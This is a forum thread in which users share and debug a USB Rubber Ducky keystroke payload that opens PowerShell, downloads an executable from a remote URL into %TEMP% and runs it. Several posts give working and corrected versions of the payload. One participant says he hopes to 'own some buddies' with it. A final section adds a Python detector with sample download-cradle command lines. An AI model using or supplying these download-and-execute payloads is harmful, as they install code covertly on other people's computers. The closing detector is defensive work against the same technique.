mubix Posted December 31, 2011

I recently added a Ducky payload to the page http://www.usbrubber...ll_wget_execute :

Interested in what you guys think.

    GUI r
    DELAY 100
    STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
    ENTER

HoodooTheGreat Posted November 2, 2012

Sweet, this is what I've been looking for!!!! Download and Execute is where it's at fo sure. Haven't tried it yet to see if it works or not. Hopefully it does.

PineDominator Posted November 3, 2012

> Sweet, this is what I've been looking for!!!! Download and Execute is where it's at fo sure. Haven't tried it yet to see if it works or not. Hopefully it does.

Check out http://usbrubberducky.com

HoodooTheGreat Posted November 3, 2012

> Check out http://usbrubberducky.com

Hey, thank you very much!!! Can't wait to own some buddies...hehe

HoodooTheGreat Posted November 3, 2012

I get this error when the ducky does its thing.

"Windows cannot find '#powershell'. Make sure you typed the name correctly, and then try again."

Any suggestions? Also, for the "Local filename" it should look like this, right?

PineDominator Posted November 3, 2012

> I get this error when the ducky does its thing.
>
> "Windows cannot find '#powershell'. Make sure you typed the name correctly, and then try again."
>
> Any suggestions? Also, for the "Local filename" it should look like this, right?

What version of Windows? If below 7 then you have to install PowerShell.

Edited November 3, 2012 by petertfm

HoodooTheGreat Posted November 3, 2012

> What version of Windows? If below 7 then you have to install PowerShell.

Windows 7 Ultimate. I can launch PowerShell and everything seems to be working. Could it be how I created my payload using the generate payload button? See Photobucket link to verify everything looks how it should. For local file name it should be the name of the file, correct? Example: "myfile.exe"

Edited November 3, 2012 by HoodooTheGreat

overwraith Posted November 4, 2012

This power shell download seems to work a lot better than the VBS version did. I have had a lot more luck downloading from sites that didn't support whatever protocol the VBS script did.

denied39 Posted November 16, 2012

Ok, I must be doing something wrong with this payload. Every time I try to run the payload, I get the following:

    C:\Users\xxxx>powershell -noprofile -noninteractive -command "& {$client=new-object system.net.webclient;$client.downloadfile("http://x.x.x.x/26.txt", "$env:temp\_shella.txt")}"
    Missing ')' in method call.
    At line:1 char:65
    + & {$client=new-object system.net.webclient;$client.downloadfile( <<<< http://x.x.x.x/26.txt, $env:temp\_shella.txt)}
        + CategoryInfo          : ParserError: (CloseParenToken:TokenId) [], ParentContainsErrorRecordException
        + FullyQualifiedErrorId : MissingEndParenthesisInMethodCall

I can't even get it to run right from the command line. I can get it to run if I break it up. If I run powershell first, then execute the new-object downloadfile portion, the file downloads fine. I'm running this on Windows 7 Enterprise.

Any ideas?

Neworld Posted December 10, 2012

> Ok, I must be doing something wrong with this payload. Every time I try to run the payload, I get the following:
>
>     C:\Users\xxxx>powershell -noprofile -noninteractive -command "& {$client=new-object system.net.webclient;$client.downloadfile("http://x.x.x.x/26.txt", "$env:temp\_shella.txt")}"
>     Missing ')' in method call.
>     At line:1 char:65
>     + & {$client=new-object system.net.webclient;$client.downloadfile( <<<< http://x.x.x.x/26.txt, $env:temp\_shella.txt)}
>         + CategoryInfo          : ParserError: (CloseParenToken:TokenId) [], ParentContainsErrorRecordException
>         + FullyQualifiedErrorId : MissingEndParenthesisInMethodCall
>
> I can't even get it to run right from the command line. I can get it to run if I break it up. If I run powershell first, then execute the new-object downloadfile portion, the file downloads fine. I'm running this on Windows 7 Enterprise.
>
> Any ideas?

This is because when you go into Run, they only allow a certain number of characters... You can fix this by just saying "enter" after you type power shell in...

    DELAY 2000
    GUI r
    DELAY 100
    STRING powershell
    ENTER
    STRING (new-object System.Net.WebClient).DownloadFile('Executable URL','%TEMP%\Local Filename'); Start-Process "%TEMP%\Local Filename"
    ENTER

Edited December 10, 2012 by Neworld

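For defenders, the two payload shapes in this thread leave different traces: the Run-dialog one-liner appears in the process command line, while the variant typed into an already-open console shows up in PowerShell script block logging (Event ID 4104) instead. The sketch below is an added example, not code from any poster; the event records, their field names and the `classify`/`scan` helpers are constructed for illustration.

```python
import re

# Constructed sample records (not from the thread). "proc" is a process-creation
# command line (e.g. Sysmon Event ID 1); "script" is PowerShell script block text
# (Event ID 4104), where the typed-into-the-console variant is recorded.
SAMPLE_EVENTS = [
    {"id": 1, "kind": "proc", "text": r'''powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"'''},
    {"id": 2, "kind": "script", "text": r'''(new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"'''},
    {"id": 3, "kind": "proc", "text": r'''powershell -noprofile -noninteractive -command "& {$client=new-object system.net.webclient;$client.downloadfile('http://192.0.2.10/26.txt', '$env:temp\_shella.txt')}"'''},
    {"id": 4, "kind": "proc", "text": r'''powershell -NoProfile -Command "Get-ChildItem $env:TEMP"'''},
]

# WebClient followed by DownloadFile(<url>, <destination>), in either quote style.
DOWNLOAD = re.compile(
    r"net\.webclient.*?\.downloadfile\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]+)['\"]",
    re.I | re.S)
# Start-Process with an optional -FilePath and an optionally quoted target.
EXECUTE = re.compile(r"start-process\s+(?:-filepath\s+)?['\"]?([^'\";]+)", re.I)

def normalize(text):
    # PowerShell ignores a backtick before most letters, so drop it before matching.
    return text.replace("`", "")

def classify(event):
    """Return a finding dict for a download cradle, or None if the text is clean."""
    text = normalize(event["text"])
    match = DOWNLOAD.search(text)
    if not match:
        return None
    url, dest = match.group(1), match.group(2)
    launched = [p.strip().lower() for p in EXECUTE.findall(text)]
    # Highest severity when the file that was just written is also started.
    verdict = "download-and-execute" if dest.lower() in launched else "download-only"
    return {"id": event["id"], "source": event["kind"],
            "url": url, "dest": dest, "verdict": verdict}

def scan(events):
    return [hit for hit in map(classify, events) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```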